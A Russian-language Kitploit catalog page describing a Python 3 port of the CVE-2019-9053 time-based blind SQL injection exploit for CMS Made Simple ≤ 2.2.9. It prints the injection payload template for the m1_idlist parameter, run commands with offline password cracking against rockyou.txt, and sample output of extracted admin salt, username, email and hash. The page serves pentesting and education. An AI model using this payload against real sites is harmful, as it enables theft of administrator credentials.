Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2019-9053-py3 — Неавторизованный эксплойт временной слепой SQL-инъекции для CMS Made Simple ≤ 2.2.9 (CVE-2019-9053), портированный на Python 3. | Kitploit
Инструменты/GitHubGitHub/vedantrana73/cve-2019-9053-py3
Взлом паролейАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubvedantrana73/cve-2019-9053-py3

cve-2019-9053-py3

Неавторизованный эксплойт временной слепой SQL-инъекции для CMS Made Simple ≤ 2.2.9 (CVE-2019-9053), портированный на Python 3.

Репозиторий
1 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2019-9053 — CMS Made Simple SQLi Эксплойт (Python 3)

Python CVE Type Target License

Отказ от ответственности: Этот инструмент предназначен только для авторизованного тестирования на проникновение и образовательных целей. Запуск этого средства против систем без явного письменного разрешения незаконен. Автор не несет ответственности за неправомерное использование.


Обзор

Это порт на Python 3 публичного эксплойта для CVE-2019-9053 — неаутентифицированной time-based blind SQL инъекции в CMS Made Simple ≤ 2.2.9.

Уязвимый параметр — m1_idlist на конечной точке /moduleinterface.php (модуль News). Пользовательский ввод передаётся без санитизации в SQL-запрос, что позволяет неаутентифицированному атакующему извлечь соль администратора, имя пользователя, email и хеш пароля, а затем опционально взломать пароль офлайн.

Оригинальный эксплойт от Daniele Scanu @ Certimeter Group.
Порт на Python 3 с исправлениями и очисткой.


Как это работает

Эксплойт использует timing-оракул — он инжектирует SELECT sleep(T) в условие SQL LIKE и измеряет время ответа HTTP. Если сервер задерживается на ≥ T секунд, значит инжектированное условие истинно. Это позволяет извлекать данные по одному символу без какого-либо отображения данных в теле HTTP-ответа.

root@kitploit:~
Payload structure:
  m1_idlist=a,b,1,5))+and+(select+sleep(1)+from+cms_users
            +where+password+like+0x{hex(known_prefix+guess)}25
            +and+user_id+like+0x31)+--+

Порядок извлечения:

После извлечения опциональная офлайн-атака по словарю вычисляет MD5(salt + word) против списка слов — никаких дополнительных сетевых запросов не требуется.


Изменения для Python 3

Исходный скрипт был написан для Python 2. Были исправлены следующие критические изменения:


Требования

root@kitploit:~
pip3 install requests termcolor
ЗависимостьНазначение
requestsHTTP-запросы к цели
termcolorЦветной вывод в терминал

Использование

root@kitploit:~
# Basic extraction (no password cracking)
python3 exploit.py -u http://<target-ip>/simple

# Extraction + offline password cracking
python3 exploit.py -u http://<target-ip>/simple --crack -w /usr/share/wordlists/rockyou.txt

Параметры

ФлагОписание
-u, --urlБазовый URL установки CMS Made Simple

Пример вывода

root@kitploit:~
[+] Salt for password found: 1234abcd
[+] Username found: admin
[+] Email found: [email protected]
[+] Password found: a1b2c3d4e5f6...
[+] Password cracked: password123

Детали CVE


Ссылки

  • NVD — CVE-2019-9053
  • Оригинальный эксплойт — Exploit-DB #46635
  • CMS Made Simple

Правовая информация

Данный эксплойт предоставлен только для авторизованного тестирования на проникновение и использования в CTF/образовательных целях.
Несанкционированное использование против систем, которые вам не принадлежат или на тестирование которых у вас нет явного письменного разрешения, является уголовным преступлением в соответствии с Законом об информационных технологиях 2000 г. (Индия) и аналогичными законами по всему миру.

Скачать инструмент
ШагПолеТаблицаПримечания
1Сольcms_siteprefsНеобходима для взлома пароля
2Имя пользователяcms_usersuser_id = 1 (admin)
3Emailcms_usersuser_id = 1 (admin)
4Парольcms_usersХранится как MD5(salt + password)
№ИзменениеПричина
1print "..." → print("...")print — функция в Python 3
2hashlib.md5(str(salt) + line) → hashlib.md5((salt + line).encode())hashlib.md5() требует bytes в Python 3
3dict = open(wordlist) → with open(wordlist) as wordlist_filedict затеняет встроенную функцию; перешли на контекстный менеджер
4print "\033c" → print("\033c", end="")Избегает двойного перевода строки при очистке терминала
5print colored(...) → print(colored(...))colored() возвращает строку; требуется обёртка print()
-w, --wordlistПуть к списку слов для офлайн-взлома пароля
-c, --crackВключить режим взлома пароля
ПолеЗначение
CVE IDCVE-2019-9053
CVSS Score7.5 (Высокий)
ТипНеаутентифицированная Time-Based Blind SQL инъекция
ЗатронутоCMS Made Simple ≤ 2.2.9
Параметрm1_idlist в модуле News
АутентификацияНе требуется
ИсправлениеCMS Made Simple 2.2.10+